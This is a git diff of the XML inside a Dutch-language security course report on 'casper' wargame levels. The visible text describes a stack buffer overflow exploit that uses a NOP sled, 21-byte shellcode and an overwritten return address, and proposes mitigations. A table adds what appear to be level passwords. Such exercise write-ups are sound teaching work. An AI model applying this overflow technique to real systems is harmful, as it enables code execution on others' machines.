-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit geavanceerde level heeft d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ezelfde structuur als casper4. Het enige verschil is dat de het gebruik maakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>clearEnvironment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie om de environment variabelen te verwijderen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dezelfde exploit als deze van casper4 kan gebruikt worden omdat deze oplossing niet gebruik maakt van environment variabelen.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Het bevat nog steeds dezelfde </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerabilities</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -1962,13 +3336,7 @@
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Advanced level: Casper</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>61</w:t>
+        <w:t>Advanced level: Casper61</w:t>
       </w:r>
       <w:bookmarkEnd w:id="13"/>
     </w:p>
@@ -2297,6 +3665,7 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
+    <w:sdtEndPr/>
     <w:sdtContent>
       <w:p>
         <w:pPr>
@@ -2535,6 +3904,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="36535F5A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="85327454"/>
+    <w:lvl w:ilvl="0" w:tplc="10000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="10000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="10000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="547B4634"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1000001F"/>
@@ -2618,6 +4100,119 @@
       <w:pPr>
         <w:ind w:left="4320" w:hanging="1440"/>
       </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="776F3E43"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="BDB6864C"/>
+    <w:lvl w:ilvl="0" w:tplc="10000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="10000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="10000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
@@ -2627,6 +4222,12 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="3">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="5">
     <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
@@ -2755,6 +4356,7 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -2801,8 +4403,10 @@
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
@@ -3130,7 +4734,6 @@
     </w:pPr>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-      <w:lang/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="GeenafstandChar">
@@ -3141,7 +4744,6 @@
     <w:rsid w:val="003E7BE4"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-      <w:lang/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="Kop1Char">
@@ -3168,9 +4770,6 @@
     <w:pPr>
       <w:outlineLvl w:val="9"/>
     </w:pPr>
-    <w:rPr>
-      <w:lang/>
-    </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Inhopg1">
     <w:name w:val="toc 1"/>
@@ -3454,6 +5053,17 @@
       <w:ind w:left="220"/>
     </w:pPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Lijstalinea">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="009E3BEF"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -3634,6 +5244,27 @@
     <w:pitch w:val="variable"/>
     <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
+  <w:font w:name="Symbol">
+    <w:panose1 w:val="05050102010706020507"/>
+    <w:charset w:val="02"/>
+    <w:family w:val="roman"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="00000000" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
+  </w:font>
+  <w:font w:name="Courier New">
+    <w:panose1 w:val="02070309020205020404"/>
+    <w:charset w:val="00"/>
+    <w:family w:val="modern"/>
+    <w:pitch w:val="fixed"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+  </w:font>
+  <w:font w:name="Wingdings">
+    <w:panose1 w:val="05000000000000000000"/>
+    <w:charset w:val="02"/>
+    <w:family w:val="auto"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="00000000" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
+  </w:font>
   <w:font w:name="Calibri">
     <w:panose1 w:val="020F0502020204030204"/>
     <w:charset w:val="00"/>
@@ -3669,6 +5300,8 @@
     <w:rsidRoot w:val="007B5ECD"/>
     <w:rsid w:val="00183736"/>
     <w:rsid w:val="007B5ECD"/>
+    <w:rsid w:val="00AB22A5"/>
+    <w:rsid w:val="00CA0CD2"/>
   </w:rsids>
   <m:mathPr>
     <m:mathFont m:val="Cambria Math"/>
@@ -4465,7 +6098,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A779DE11-4DEB-46F9-B1F4-E2199CC410CF}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2D22B44F-9F1D-4703-943D-EB6AA235B621}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/verslag/verslag_dev_Sec.docx
+++ b/verslag/verslag_dev_Sec.docx
@@ -10,7 +10,6 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p/>
         <w:tbl>
@@ -46,7 +45,6 @@
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties'" w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
                 <w:text/>
               </w:sdtPr>
-              <w:sdtEndPr/>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -119,7 +117,6 @@
                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                   <w:text/>
                 </w:sdtPr>
-                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -164,7 +161,6 @@
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                 <w:text/>
               </w:sdtPr>
-              <w:sdtEndPr/>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -234,7 +230,6 @@
                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                   <w:text/>
                 </w:sdtPr>
-                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -277,7 +272,6 @@
                     <w:calendar w:val="gregorian"/>
                   </w:date>
                 </w:sdtPr>
-                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -1589,15 +1583,7 @@
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>c</w:t>
-            </w:r>
-            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="1"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t>asper6</w:t>
+              <w:t>casper6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1612,6 +1598,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>EetVSPHTbn3M1moui3Gg88DbItByyPWz</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1640,6 +1632,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>casper61</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1653,6 +1651,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Sb7ihQ4sGLEQj0O15AG0ke3xgggRsFjF</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1746,11 +1750,11 @@
         <w:pStyle w:val="Kop1"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc25519920"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc25519920"/>
       <w:r>
         <w:t>Casper4</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1760,7 +1764,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc25519921"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc25519921"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -1768,7 +1772,7 @@
         </w:rPr>
         <w:t>Omschrijving</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -1953,7 +1957,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc25519922"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc25519922"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -1961,7 +1965,7 @@
         </w:rPr>
         <w:t>Vulnerability</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="3"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -2120,14 +2124,14 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc25519923"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc25519923"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Exploit beschrijving</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2213,13 +2217,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">” </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2366,13 +2364,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t>bij een invoer van 1000 karakters</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>,</w:t>
+        <w:t>bij een invoer van 1000 karakters,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2742,6 +2734,38 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Er zijn meerdere mogelijkheden mogelijk, zo kan de hoeveel NOP operaties en het aantal opvul bytes aangepast worden.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Dit blijf correct zolang de totale invoer 1015 bytes bevat, de 21 bytes shellcode hetzelfde blijft en het adres verwijst naar een plaats in het geheugen van de geschreven NOP operaties</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> voor de shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2751,465 +2775,459 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc25519924"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc25519924"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t>Mitigation</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze aanval kan op v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">erschillende manieren </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>worden</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gemitigate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De implementatie van de c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ode kan aangepast worden door gebruik maakt van de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">functie met 3 parameters. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze extra parameter geeft het maximum aantal karakters dat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>programma</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is het maximum gelijk aan 999 karakters.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een tweede manier is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>oor gebruik te maken van een niet uitvoerbare stack. Hierdoor kan het returnadres nog steeds overschreven worden maar de code kan niet uitgevoerd worden</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in de stack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
